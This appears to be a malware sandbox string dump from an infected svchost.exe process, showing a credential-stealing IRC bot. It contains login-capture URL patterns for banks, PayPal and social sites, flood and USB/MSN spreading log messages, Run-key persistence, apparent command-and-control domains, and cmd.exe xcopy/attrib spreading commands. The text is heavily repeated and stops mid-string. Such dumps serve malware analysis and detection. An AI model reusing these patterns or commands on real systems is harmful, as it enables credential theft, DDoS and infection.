(p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>URLDownloadToFileW</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>RegNotifyChangeKeyValue</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>{A5DCBF10-6530-11D2-901F-00C04FB951ED}</pre><pre>shlwapi.dll</pre><pre>crypt32.dll</pre><pre>wtsapi32.dll</pre><pre>samcli.dll</pre><pre>netutils.dll</pre><pre>userenv.dll</pre><pre>WindowsSecondaryDesktop</pre><pre>\charmap.exe</pre><pre>\Windows Media Player\wmprph.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>Aadvapi32.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><b>svchost.exe_3856_rwx_000D0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>svchost.exe_3856_rwx_00B80000_00029000:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>*windows defender*</pre><pre>*windowsupdate*</pre><pre>*drweb*</pre><pre>dwwin.exe</pre><pre>kernel32.dll</pre><pre>iphlpapi.dll</pre><pre>GetExtendedTcpTable</pre><pre>GetOwnerModuleFromTcpEntry</pre><pre>%systemroot%</pre><pre>%programfiles%\Common Files\*\*.exe</pre><pre>%appdata%\Identities\*.exe</pre><pre>%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe</pre><pre>ole32.dll</pre><pre>/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe</pre><pre>%SystemRoot%\system32\SHELL32.dll</pre><pre>%s\c731200</pre><pre>%s\%s</pre><pre>%s\%s.lnk</pre><pre>Windows_Shared_Mutex_231_c000100</pre><pre>ntdll.dll</pre><pre>\ScreenSaverPro.scr</pre><pre>\temp.bin</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>urlmon.dll</pre><pre>wininet.dll</pre><pre>gdi32.dll</pre><pre>rpcrt4.dll</pre><pre>netapi32.dll</pre><pre>*.exe</pre><pre>.gonewiththewings</pre><pre>*.gonewiththewings</pre><pre>WinExec</pre><pre>URLDownloadToFileA</pre><pre>http://www.google.com</pre><pre>\calc.exe</pre><pre>\Reader_sl.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>notepad.exe</pre><pre>\notepad.exe</pre><pre>\svchost.exe</pre><pre>WindowsId</pre><pre>Identities\%s</pre><pre>%s\%s\%s.exe</pre><pre>:Zone.Identifier</pre><pre>.quarantined</pre><pre>"%s" -shell</pre><pre>"%s" -bind</pre><pre>userinit.exe</pre><pre>explorer.exe</pre><pre>Windows critical error, require reboot</pre><pre>Windows Update</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>GetProcessHeap</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyA</pre><pre>RegEnumKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteExW</pre><pre>SHELL32.dll</pre><pre>SetTcpEntry</pre><pre>SHLWAPI.dll</pre><pre>RPCRT4.dll</pre><pre>NETAPI32.dll</pre><pre>DNSAPI.dll</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>Software\WindowsId Manager Reader</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>WindowsMark</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>%System%\notepad.exe</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0A</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&passw